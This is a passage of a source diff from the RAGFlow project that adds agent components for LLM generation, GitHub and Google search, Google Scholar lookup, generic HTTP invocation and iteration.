175
+ for n, v in kwargs.items():
176
+ prompt = re.sub(r"\{%s\}" % re.escape(n), str(v).replace("\\", " "), prompt)
177
+
178
+ if not self._param.inputs and prompt.find("{input}") >= 0:
179
+ retrieval_res = self.get_input()
180
+ input = (" - " + "\n - ".join(
181
+ [c for c in retrieval_res["content"] if isinstance(c, str)])) if "content" in retrieval_res else ""
182
+ prompt = re.sub(r"\{input\}", re.escape(input), prompt)
183
+
184
+ downstreams = self._canvas.get_component(self._id)["downstream"]
185
+ if kwargs.get("stream") and len(downstreams) == 1 and self._canvas.get_component(downstreams[0])[
186
+ "obj"].component_name.lower() == "answer":
187
+ return partial(self.stream_output, chat_mdl, prompt, retrieval_res)
188
+
189
+ if "empty_response" in retrieval_res.columns and not "".join(retrieval_res["content"]):
190
+ empty_res = "\n- ".join([str(t) for t in retrieval_res["empty_response"] if str(t)])
191
+ res = {"content": empty_res if empty_res else "Nothing found in knowledgebase!", "reference": []}
192
+ return pd.DataFrame([res])
193
+
194
+ msg = self._canvas.get_history(self._param.message_history_window_size)
195
+ if len(msg) < 1:
196
+ msg.append({"role": "user", "content": "Output: "})
197
+ _, msg = message_fit_in([{"role": "system", "content": prompt}, *msg], int(chat_mdl.max_length * 0.97))
198
+ if len(msg) < 2:
199
+ msg.append({"role": "user", "content": "Output: "})
200
+ ans = chat_mdl.chat(msg[0]["content"], msg[1:], self._param.gen_conf())
201
+
202
+ if self._param.cite and "content_ltks" in retrieval_res.columns and "vector" in retrieval_res.columns:
203
+ res = self.set_cite(retrieval_res, ans)
204
+ return pd.DataFrame([res])
205
+
206
+ return Generate.be_output(ans)
207
+
208
+ def stream_output(self, chat_mdl, prompt, retrieval_res):
209
+ res = None
210
+ if "empty_response" in retrieval_res.columns and not "".join(retrieval_res["content"]):
211
+ empty_res = "\n- ".join([str(t) for t in retrieval_res["empty_response"] if str(t)])
212
+ res = {"content": empty_res if empty_res else "Nothing found in knowledgebase!", "reference": []}
213
+ yield res
214
+ self.set_output(res)
215
+ return
216
+
217
+ msg = self._canvas.get_history(self._param.message_history_window_size)
218
+ if len(msg) < 1:
219
+ msg.append({"role": "user", "content": "Output: "})
220
+ _, msg = message_fit_in([{"role": "system", "content": prompt}, *msg], int(chat_mdl.max_length * 0.97))
221
+ if len(msg) < 2:
222
+ msg.append({"role": "user", "content": "Output: "})
223
+ answer = ""
224
+ for ans in chat_mdl.chat_streamly(msg[0]["content"], msg[1:], self._param.gen_conf()):
225
+ res = {"content": ans, "reference": []}
226
+ answer = ans
227
+ yield res
228
+
229
+ if self._param.cite and "content_ltks" in retrieval_res.columns and "vector" in retrieval_res.columns:
230
+ res = self.set_cite(retrieval_res, answer)
231
+ yield res
232
+
233
+ self.set_output(Generate.be_output(res))
234
+
235
+ def debug(self, **kwargs):
236
+ chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)
237
+ prompt = self._param.prompt
238
+
239
+ for para in self._param.debug_inputs:
240
+ kwargs[para["key"]] = para.get("value", "")
241
+
242
+ for n, v in kwargs.items():
243
+ prompt = re.sub(r"\{%s\}" % re.escape(n), str(v).replace("\\", " "), prompt)
244
+
245
+ u = kwargs.get("user")
246
+ ans = chat_mdl.chat(prompt, [{"role": "user", "content": u if u else "Output: "}], self._param.gen_conf())
247
+ return pd.DataFrame([ans])
ragflow-main/agent/component/github.py ADDED
@@ -0,0 +1,61 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ import logging
17
+ from abc import ABC
18
+ import pandas as pd
19
+ import requests
20
+ from agent.component.base import ComponentBase, ComponentParamBase
21
+
22
+
23
+ class GitHubParam(ComponentParamBase):
24
+ """
25
+ Define the GitHub component parameters.
26
+ """
27
+
28
+ def __init__(self):
29
+ super().__init__()
30
+ self.top_n = 10
31
+
32
+ def check(self):
33
+ self.check_positive_integer(self.top_n, "Top N")
34
+
35
+
36
+ class GitHub(ComponentBase, ABC):
37
+ component_name = "GitHub"
38
+
39
+ def _run(self, history, **kwargs):
40
+ ans = self.get_input()
41
+ ans = " - ".join(ans["content"]) if "content" in ans else ""
42
+ if not ans:
43
+ return GitHub.be_output("")
44
+
45
+ try:
46
+ url = 'https://api.github.com/search/repositories?q=' + ans + '&sort=stars&order=desc&per_page=' + str(
47
+ self._param.top_n)
48
+ headers = {"Content-Type": "application/vnd.github+json", "X-GitHub-Api-Version": '2022-11-28'}
49
+ response = requests.get(url=url, headers=headers).json()
50
+
51
+ github_res = [{"content": '<a href="' + i["html_url"] + '">' + i["name"] + '</a>' + str(
52
+ i["description"]) + '\n stars:' + str(i['watchers'])} for i in response['items']]
53
+ except Exception as e:
54
+ return GitHub.be_output("**ERROR**: " + str(e))
55
+
56
+ if not github_res:
57
+ return GitHub.be_output("")
58
+
59
+ df = pd.DataFrame(github_res)
60
+ logging.debug(f"df: {df}")
61
+ return df
ragflow-main/agent/component/google.py ADDED
@@ -0,0 +1,96 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ import logging
17
+ from abc import ABC
18
+ from serpapi import GoogleSearch
19
+ import pandas as pd
20
+ from agent.component.base import ComponentBase, ComponentParamBase
21
+
22
+
23
+ class GoogleParam(ComponentParamBase):
24
+ """
25
+ Define the Google component parameters.
26
+ """
27
+
28
+ def __init__(self):
29
+ super().__init__()
30
+ self.top_n = 10
31
+ self.api_key = "xxx"
32
+ self.country = "cn"
33
+ self.language = "en"
34
+
35
+ def check(self):
36
+ self.check_positive_integer(self.top_n, "Top N")
37
+ self.check_empty(self.api_key, "SerpApi API key")
38
+ self.check_valid_value(self.country, "Google Country",
39
+ ['af', 'al', 'dz', 'as', 'ad', 'ao', 'ai', 'aq', 'ag', 'ar', 'am', 'aw', 'au', 'at',
40
+ 'az', 'bs', 'bh', 'bd', 'bb', 'by', 'be', 'bz', 'bj', 'bm', 'bt', 'bo', 'ba', 'bw',
41
+ 'bv', 'br', 'io', 'bn', 'bg', 'bf', 'bi', 'kh', 'cm', 'ca', 'cv', 'ky', 'cf', 'td',
42
+ 'cl', 'cn', 'cx', 'cc', 'co', 'km', 'cg', 'cd', 'ck', 'cr', 'ci', 'hr', 'cu', 'cy',
43
+ 'cz', 'dk', 'dj', 'dm', 'do', 'ec', 'eg', 'sv', 'gq', 'er', 'ee', 'et', 'fk', 'fo',
44
+ 'fj', 'fi', 'fr', 'gf', 'pf', 'tf', 'ga', 'gm', 'ge', 'de', 'gh', 'gi', 'gr', 'gl',
45
+ 'gd', 'gp', 'gu', 'gt', 'gn', 'gw', 'gy', 'ht', 'hm', 'va', 'hn', 'hk', 'hu', 'is',
46
+ 'in', 'id', 'ir', 'iq', 'ie', 'il', 'it', 'jm', 'jp', 'jo', 'kz', 'ke', 'ki', 'kp',
47
+ 'kr', 'kw', 'kg', 'la', 'lv', 'lb', 'ls', 'lr', 'ly', 'li', 'lt', 'lu', 'mo', 'mk',
48
+ 'mg', 'mw', 'my', 'mv', 'ml', 'mt', 'mh', 'mq', 'mr', 'mu', 'yt', 'mx', 'fm', 'md',
49
+ 'mc', 'mn', 'ms', 'ma', 'mz', 'mm', 'na', 'nr', 'np', 'nl', 'an', 'nc', 'nz', 'ni',
50
+ 'ne', 'ng', 'nu', 'nf', 'mp', 'no', 'om', 'pk', 'pw', 'ps', 'pa', 'pg', 'py', 'pe',
51
+ 'ph', 'pn', 'pl', 'pt', 'pr', 'qa', 're', 'ro', 'ru', 'rw', 'sh', 'kn', 'lc', 'pm',
52
+ 'vc', 'ws', 'sm', 'st', 'sa', 'sn', 'rs', 'sc', 'sl', 'sg', 'sk', 'si', 'sb', 'so',
53
+ 'za', 'gs', 'es', 'lk', 'sd', 'sr', 'sj', 'sz', 'se', 'ch', 'sy', 'tw', 'tj', 'tz',
54
+ 'th', 'tl', 'tg', 'tk', 'to', 'tt', 'tn', 'tr', 'tm', 'tc', 'tv', 'ug', 'ua', 'ae',
55
+ 'uk', 'gb', 'us', 'um', 'uy', 'uz', 'vu', 've', 'vn', 'vg', 'vi', 'wf', 'eh', 'ye',
56
+ 'zm', 'zw'])
57
+ self.check_valid_value(self.language, "Google languages",
58
+ ['af', 'ak', 'sq', 'ws', 'am', 'ar', 'hy', 'az', 'eu', 'be', 'bem', 'bn', 'bh',
59
+ 'xx-bork', 'bs', 'br', 'bg', 'bt', 'km', 'ca', 'chr', 'ny', 'zh-cn', 'zh-tw', 'co',
60
+ 'hr', 'cs', 'da', 'nl', 'xx-elmer', 'en', 'eo', 'et', 'ee', 'fo', 'tl', 'fi', 'fr',
61
+ 'fy', 'gaa', 'gl', 'ka', 'de', 'el', 'kl', 'gn', 'gu', 'xx-hacker', 'ht', 'ha', 'haw',
62
+ 'iw', 'hi', 'hu', 'is', 'ig', 'id', 'ia', 'ga', 'it', 'ja', 'jw', 'kn', 'kk', 'rw',
63
+ 'rn', 'xx-klingon', 'kg', 'ko', 'kri', 'ku', 'ckb', 'ky', 'lo', 'la', 'lv', 'ln', 'lt',
64
+ 'loz', 'lg', 'ach', 'mk', 'mg', 'ms', 'ml', 'mt', 'mv', 'mi', 'mr', 'mfe', 'mo', 'mn',
65
+ 'sr-me', 'my', 'ne', 'pcm', 'nso', 'no', 'nn', 'oc', 'or', 'om', 'ps', 'fa',
66
+ 'xx-pirate', 'pl', 'pt', 'pt-br', 'pt-pt', 'pa', 'qu', 'ro', 'rm', 'nyn', 'ru', 'gd',
67
+ 'sr', 'sh', 'st', 'tn', 'crs', 'sn', 'sd', 'si', 'sk', 'sl', 'so', 'es', 'es-419', 'su',
68
+ 'sw', 'sv', 'tg', 'ta', 'tt', 'te', 'th', 'ti', 'to', 'lua', 'tum', 'tr', 'tk', 'tw',
69
+ 'ug', 'uk', 'ur', 'uz', 'vu', 'vi', 'cy', 'wo', 'xh', 'yi', 'yo', 'zu']
70
+ )
71
+
72
+
73
+ class Google(ComponentBase, ABC):
74
+ component_name = "Google"
75
+
76
+ def _run(self, history, **kwargs):
77
+ ans = self.get_input()
78
+ ans = " - ".join(ans["content"]) if "content" in ans else ""
79
+ if not ans:
80
+ return Google.be_output("")
81
+
82
+ try:
83
+ client = GoogleSearch(
84
+ {"engine": "google", "q": ans, "api_key": self._param.api_key, "gl": self._param.country,
85
+ "hl": self._param.language, "num": self._param.top_n})
86
+ google_res = [{"content": '<a href="' + i["link"] + '">' + i["title"] + '</a> ' + i["snippet"]} for i in
87
+ client.get_dict()["organic_results"]]
88
+ except Exception:
89
+ return Google.be_output("**ERROR**: Existing Unavailable Parameters!")
90
+
91
+ if not google_res:
92
+ return Google.be_output("")
93
+
94
+ df = pd.DataFrame(google_res)
95
+ logging.debug(f"df: {df}")
96
+ return df
ragflow-main/agent/component/googlescholar.py ADDED
@@ -0,0 +1,70 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ import logging
17
+ from abc import ABC
18
+ import pandas as pd
19
+ from agent.component.base import ComponentBase, ComponentParamBase
20
+ from scholarly import scholarly
21
+
22
+
23
+ class GoogleScholarParam(ComponentParamBase):
24
+ """
25
+ Define the GoogleScholar component parameters.
26
+ """
27
+
28
+ def __init__(self):
29
+ super().__init__()
30
+ self.top_n = 6
31
+ self.sort_by = 'relevance'
32
+ self.year_low = None
33
+ self.year_high = None
34
+ self.patents = True
35
+
36
+ def check(self):
37
+ self.check_positive_integer(self.top_n, "Top N")
38
+ self.check_valid_value(self.sort_by, "GoogleScholar Sort_by", ['date', 'relevance'])
39
+ self.check_boolean(self.patents, "Whether or not to include patents, defaults to True")
40
+
41
+
42
+ class GoogleScholar(ComponentBase, ABC):
43
+ component_name = "GoogleScholar"
44
+
45
+ def _run(self, history, **kwargs):
46
+ ans = self.get_input()
47
+ ans = " - ".join(ans["content"]) if "content" in ans else ""
48
+ if not ans:
49
+ return GoogleScholar.be_output("")
50
+
51
+ scholar_client = scholarly.search_pubs(ans, patents=self._param.patents, year_low=self._param.year_low,
52
+ year_high=self._param.year_high, sort_by=self._param.sort_by)
53
+ scholar_res = []
54
+ for i in range(self._param.top_n):
55
+ try:
56
+ pub = next(scholar_client)
57
+ scholar_res.append({"content": 'Title: ' + pub['bib']['title'] + '\n_Url: <a href="' + pub[
58
+ 'pub_url'] + '"></a> ' + "\n author: " + ",".join(pub['bib']['author']) + '\n Abstract: ' + pub[
59
+ 'bib'].get('abstract', 'no abstract')})
60
+
61
+ except StopIteration or Exception:
62
+ logging.exception("GoogleScholar")
63
+ break
64
+
65
+ if not scholar_res:
66
+ return GoogleScholar.be_output("")
67
+
68
+ df = pd.DataFrame(scholar_res)
69
+ logging.debug(f"df: {df}")
70
+ return df
ragflow-main/agent/component/invoke.py ADDED
@@ -0,0 +1,116 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ import json
17
+ import re
18
+ from abc import ABC
19
+ import requests
20
+ from deepdoc.parser import HtmlParser
21
+ from agent.component.base import ComponentBase, ComponentParamBase
22
+
23
+
24
+ class InvokeParam(ComponentParamBase):
25
+ """
26
+ Define the Crawler component parameters.
27
+ """
28
+
29
+ def __init__(self):
30
+ super().__init__()
31
+ self.proxy = None
32
+ self.headers = ""
33
+ self.method = "get"
34
+ self.variables = []
35
+ self.url = ""
36
+ self.timeout = 60
37
+ self.clean_html = False
38
+
39
+ def check(self):
40
+ self.check_valid_value(self.method.lower(), "Type of content from the crawler", ['get', 'post', 'put'])
41
+ self.check_empty(self.url, "End point URL")
42
+ self.check_positive_integer(self.timeout, "Timeout time in second")
43
+ self.check_boolean(self.clean_html, "Clean HTML")
44
+
45
+
46
+ class Invoke(ComponentBase, ABC):
47
+ component_name = "Invoke"
48
+
49
+ def _run(self, history, **kwargs):
50
+ args = {}
51
+ for para in self._param.variables:
52
+ if para.get("component_id"):
53
+ if '@' in para["component_id"]:
54
+ component = para["component_id"].split('@')[0]
55
+ field = para["component_id"].split('@')[1]
56
+ cpn = self._canvas.get_component(component)["obj"]
57
+ for param in cpn._param.query:
58
+ if param["key"] == field:
59
+ if "value" in param:
60
+ args[para["key"]] = param["value"]
61
+ else:
62
+ cpn = self._canvas.get_component(para["component_id"])["obj"]
63
+ if cpn.component_name.lower() == "answer":
64
+ args[para["key"]] = self._canvas.get_history(1)[0]["content"]
65
+ continue
66
+ _, out = cpn.output(allow_partial=False)
67
+ if not out.empty:
68
+ args[para["key"]] = "\n".join(out["content"])
69
+ else:
70
+ args[para["key"]] = para["value"]
71
+
72
+ url = self._param.url.strip()
73
+ if url.find("http") != 0:
74
+ url = "http://" + url
75
+
76
+ method = self._param.method.lower()
77
+ headers = {}
78
+ if self._param.headers:
79
+ headers = json.loads(self._param.headers)
80
+ proxies = None
81
+ if re.sub(r"https?:?/?/?", "", self._param.proxy):
82
+ proxies = {"http": self._param.proxy, "https": self._param.proxy}
83
+
84
+ if method == 'get':
85
+ response = requests.get(url=url,
86
+ params=args,
87
+ headers=headers,
88
+ proxies=proxies,
89
+ timeout=self._param.timeout)
90
+ if self._param.clean_html:
91
+ sections = HtmlParser()(None, response.content)
92
+ return Invoke.be_output("\n".join(sections))
93
+
94
+ return Invoke.be_output(response.text)
95
+
96
+ if method == 'put':
97
+ response = requests.put(url=url,
98
+ data=args,
99
+ headers=headers,
100
+ proxies=proxies,
101
+ timeout=self._param.timeout)
102
+ if self._param.clean_html:
103
+ sections = HtmlParser()(None, response.content)
104
+ return Invoke.be_output("\n".join(sections))
105
+ return Invoke.be_output(response.text)
106
+
107
+ if method == 'post':
108
+ response = requests.post(url=url,
109
+ json=args,
110
+ headers=headers,
111
+ proxies=proxies,
112
+ timeout=self._param.timeout)
113
+ if self._param.clean_html:
114
+ sections = HtmlParser()(None, response.content)
115
+ return Invoke.be_output("\n".join(sections))
116
+ return Invoke.be_output(response.text)
ragflow-main/agent/component/iteration.py ADDED
@@ -0,0 +1,45 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ from abc import ABC
17
+ from agent.component.base import ComponentBase, ComponentParamBase
18
+
19
+
20
+ class IterationParam(ComponentParamBase):
21
+ """
22
+ Define the Iteration component parameters.
23
+ """
24
+
25
+ def __init__(self):
26
+ super().__init__()
27
+ self.delimiter = ","
28
+
29
+ def check(self):
30
+ self.check_empty(self.delimiter, "Delimiter")
31
+
32
+
33
+ class Iteration(ComponentBase, ABC):
34
+ component_name = "Iteration"
35
+
36
+ def get_start(self):
37
+ for cid in self._canvas.components.keys():
38
+ if self._canvas.get_component(cid)["obj"].component_name.lower() != "iterationitem":
39
+ continue
40
+ if self._canvas.get_component(cid)["parent_id"] == self._id:
41
+ return self._canvas.get_component(cid)
42
+
43
+ def _run(self, history, **kwargs):
44
+ return self.output(allow_partial=False)[1]
45
+